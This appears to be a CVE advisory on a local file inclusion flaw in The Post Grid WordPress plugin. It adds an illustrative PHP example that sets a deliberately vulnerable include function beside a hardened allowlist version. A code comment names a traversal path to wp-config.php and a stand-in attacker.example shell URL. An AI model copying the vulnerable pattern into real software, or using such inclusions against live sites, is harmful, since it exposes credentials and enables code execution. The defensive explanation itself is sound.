Impact
The Post Grid plugin (RadiusTheme) contains an improper control of the filename used in a PHP include/require statement, classified as CWE‑98. An attacker who can influence that filename can make the plugin attempt to include files it was never meant to load. The result is a local file inclusion vulnerability: including a non‑PHP file can disclose its contents, while including a PHP file the attacker has managed to place on the server (or, where the PHP configuration permits remote inclusion, a file on a remote host) leads to code execution. The actual impact therefore depends on which files are reachable and on the server configuration.
Affected Systems
Affected systems are WordPress sites running RadiusTheme’s The Post Grid plugin at version 7.7.17 or any earlier release. No other products or vendors are listed in the CVE data.
Risk and Exploitability
The CVSS score of 7.5 places the vulnerability in the High severity band. The EPSS score is below 1 %, indicating a very low estimated probability of exploitation at present, and the CVE is not listed in the CISA KEV catalog. The attack vector is file inclusion on the web server: an attacker who can influence the value the plugin passes to include or require could read configuration files (on WordPress, wp-config.php holds the database credentials) or execute code if they can first place a file on the server, for example through an upload feature, or if the PHP configuration allows remote inclusion (allow_url_include). Note that including an existing PHP file executes it rather than displaying its source, so disclosure and execution are two distinct outcomes of the same flaw. The CVE data lists no exploitation preconditions beyond the presence of the vulnerable plugin, but it also does not identify the affected parameter or the privilege level required to reach it; until the plugin is updated, any installation on the affected versions that exposes The Post Grid’s query-string or other input parameters should be treated as exposed.
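The CWE‑98 pattern described in the Impact section, together with the remote-inclusion condition mentioned above, as an added illustrative example in PHP. This is not code from The Post Grid plugin: the parameter name rt_layout, the function names, the allowlist of layout names and the templates directory are all assumptions chosen to show the vulnerable shape of the bug class beside a hardened replacement.

```php
<?php
// Added illustrative example, not code from The Post Grid plugin.
// Shows the CWE-98 pattern (attacker-controlled include path) and a
// hardened replacement. 'rt_layout', the function names and the
// templates directory are hypothetical.

// --- Vulnerable pattern (do not use) ---------------------------------------
// A request parameter chooses which layout file is included. Nothing stops
// "../../wp-config.php" from being read, or, when allow_url_include=On,
// "http://attacker.example/shell.txt" from being fetched and executed.
function rt_render_layout_vulnerable(string $templates_dir): void
{
    $layout = isset($_GET['rt_layout']) ? $_GET['rt_layout'] : 'grid';
    include $templates_dir . '/' . $layout;   // CWE-98: filename not controlled
}

// --- Hardened pattern ------------------------------------------------------
// Only layouts the plugin ships with are acceptable; the request picks a
// name from this list, never a path.
const RT_ALLOWED_LAYOUTS = ['grid', 'list', 'masonry'];

/**
 * Map a requested layout name to a canonical file path inside $templates_dir,
 * or return null if the request is not one of the shipped layouts or the
 * resolved file escapes the templates directory.
 */
function rt_resolve_layout(string $templates_dir, string $requested): ?string
{
    // 1. Allowlist: strict comparison, no traversal characters can match.
    if (!in_array($requested, RT_ALLOWED_LAYOUTS, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise both paths and confirm the target
    //    still lives under the templates directory (also catches symlinks).
    $base = realpath($templates_dir);
    $path = realpath($templates_dir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function rt_render_layout_hardened(string $templates_dir): void
{
    // Reject arrays and other non-string input before doing anything with it.
    $requested = (isset($_GET['rt_layout']) && is_string($_GET['rt_layout']))
        ? $_GET['rt_layout']
        : 'grid';

    $path = rt_resolve_layout($templates_dir, $requested);
    if ($path === null) {
        // Fall back to a known shipped file rather than echoing the input.
        $path = $templates_dir . '/grid.php';
    }
    include $path;   // only ever a file we shipped, resolved by us
}

// --- Server posture check --------------------------------------------------
// The remote-file-inclusion branch of this bug class needs both settings on.
// allow_url_include has been deprecated since PHP 7.4 and should be Off.
function rt_remote_include_possible(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)
        && filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}
```

The allowlist is the real fix; the realpath check is a second layer so that a future change to the allowlist (or a symlink dropped into the templates directory) cannot quietly reintroduce traversal. rt_remote_include_possible() is the quick question to ask of a server when triaging an LFI report: with allow_url_include off, the attacker is limited to files already present on the host.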
OpenCVE Enrichment